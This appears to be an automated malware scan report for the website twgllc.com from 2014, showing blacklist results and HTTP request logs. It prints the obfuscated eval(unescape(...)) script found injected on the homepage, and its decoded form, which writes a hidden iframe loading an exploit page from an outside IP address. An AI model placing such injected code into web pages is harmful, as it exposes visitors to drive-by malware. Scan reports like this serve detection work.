Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=twgllc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://twgllc.com/ | 200 OK Content-Length: 1251 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%30%33%36%63%62%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%33%34%39%29%2b%27%65%66%30%30%35%36%5c%27%20%77%69%64%74%68%3d%31%33%39%20%68%65%69%67%68%74%3d%33%39%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=036cb1 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*54349)+'ef0056\' width=139 height=391 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=036cb1 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*54349)+'ef0056\' width=139 height=391 style=\'display: none\'></iframe>') <iframe name=036cb1 src='http://58.65.232.33/gpack/index.php?20016ef0056' width=139 height=391 style='display: none'></iframe> Antivirus reports:
| ||
http://twgllc.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://twgllc.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: twgllc.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Thu, 02 Oct 2014 15:30:29 GMT
Accept-Ranges: bytes
Age: 1596
ETag: "4e3-4515126bd8cc0"
Server: Apache/2
Content-Length: 1251
Content-Type: text/html
Expires: Thu, 02 Oct 2014 16:03:54 GMT
Last-Modified: Sun, 06 Jul 2008 01:48:11 GMT
...1251 bytes of data.
GET / HTTP/1.1
Host: twgllc.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Thu, 02 Oct 2014 15:30:29 GMT
Accept-Ranges: bytes
Age: 1596
ETag: "4e3-4515126bd8cc0"
Server: Apache/2
Content-Length: 1251
Content-Type: text/html
Expires: Thu, 02 Oct 2014 16:03:54 GMT
Last-Modified: Sun, 06 Jul 2008 01:48:11 GMT
...1251 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: twgllc.com
Referer: http://www.google.com/search?q=twgllc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: twgllc.com
Referer: http://www.google.com/search?q=twgllc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.